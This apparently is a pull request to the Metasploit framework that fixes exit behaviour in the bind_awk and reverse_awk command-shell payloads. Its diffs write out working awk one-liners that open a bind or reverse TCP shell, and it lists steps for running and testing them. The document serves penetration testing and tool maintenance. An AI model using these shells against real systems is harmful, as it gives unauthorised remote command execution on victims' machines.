### PR TITLE
Fix #14510, fix reverse_awk and bind_awk exit behavior

### DIFF
--- a/modules/payloads/singles/cmd/unix/bind_awk.rb
+++ b/modules/payloads/singles/cmd/unix/bind_awk.rb
@@ -8,7 +8,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 136
+  CachedSize = 140
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -51,17 +51,15 @@ module MetasploitModule
     awkcmd = <<~AWK
       awk 'BEGIN{
         s=\"/inet/tcp/#{datastore['LPORT']}/0/0\";
-        while(1){
-          do{
-            s|&getline c;
-            if(c){
-              while((c|&getline)>0)print $0|&s;
-              close(c)
-            }
+        do{
+          if((s|&getline c)<=0)
+            break;
+          if(c){
+            while((c|&getline)>0)print $0|&s;
+            close(c)
           }
-          while(c!=\"exit\");
-          close(s)
-        }
+        } while(c!=\"exit\")
+        close(s)
       }'
     AWK
     awkcmd.gsub!("\n",'').gsub!('  ', '')

--- a/modules/payloads/singles/cmd/unix/bind_awk.rb
+++ b/modules/payloads/singles/cmd/unix/bind_awk.rb
@@ -48,6 +48,23 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "awk 'BEGIN{s=\"/inet/tcp/#{datastore['LPORT']}/0/0\";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!=\"exit\");close(s)}}'"
+    awkcmd = <<~AWK
+      awk 'BEGIN{
+        s=\"/inet/tcp/#{datastore['LPORT']}/0/0\";
+        while(1){
+          do{
+            s|&getline c;
+            if(c){
+              while((c|&getline)>0)print $0|&s;
+              close(c)
+            }
+          }
+          while(c!=\"exit\");
+          close(s)
+        }
+      }'
+    AWK
+    awkcmd.gsub!("\n",'').gsub!('  ', '')
   end
+
 end

--- a/modules/payloads/singles/cmd/unix/reverse_awk.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_awk.rb
@@ -8,7 +8,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 150
+  CachedSize = 154
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -52,17 +52,15 @@ module MetasploitModule
     awkcmd = <<~AWK
       awk 'BEGIN{
         s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";
-        while(1){
-          do{
-            s|&getline c;
-            if(c){
-              while((c|&getline)>0)print $0|&s;
-              close(c)
-            }
+        do{
+          if((s|&getline c)<=0)
+            break;
+          if(c){
+            while((c|&getline)>0)print $0|&s;
+            close(c)
           }
-          while(c!=\"exit\");
-          close(s)
-        }
+        } while(c!=\"exit\")
+        close(s)
       }'
     AWK
     awkcmd.gsub!("\n",'').gsub!('  ', '')

--- a/modules/payloads/singles/cmd/unix/reverse_awk.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_awk.rb
@@ -49,6 +49,22 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "awk 'BEGIN{s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!=\"exit\");close(s)}}'"
+    awkcmd = <<~AWK
+      awk 'BEGIN{
+        s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";
+        while(1){
+          do{
+            s|&getline c;
+            if(c){
+              while((c|&getline)>0)print $0|&s;
+              close(c)
+            }
+          }
+          while(c!=\"exit\");
+          close(s)
+        }
+      }'
+    AWK
+    awkcmd.gsub!("\n",'').gsub!('  ', '')
   end
 end


### PR DESCRIPTION
This fixes #14510 
Thanks for reporting @egypt !

## Verification

- `use payload/cmd/unix/reverse_awk`
- `generate -f raw`
- copy the command
- `to_handler`
- paste the command into a terminal somewhere
- interact with the session: `sessions -1`
- `id` or something to make sure it's real
- `exit` or ctrl-c
- see the session close
- repeat for payload/cmd/unix/reverse_awk

## Expected behavior

clean exit

## Current behavior

If you `exit`, the payload continues to call back. If you ctrl-c, it doesn't call back anymore but the process is still there.
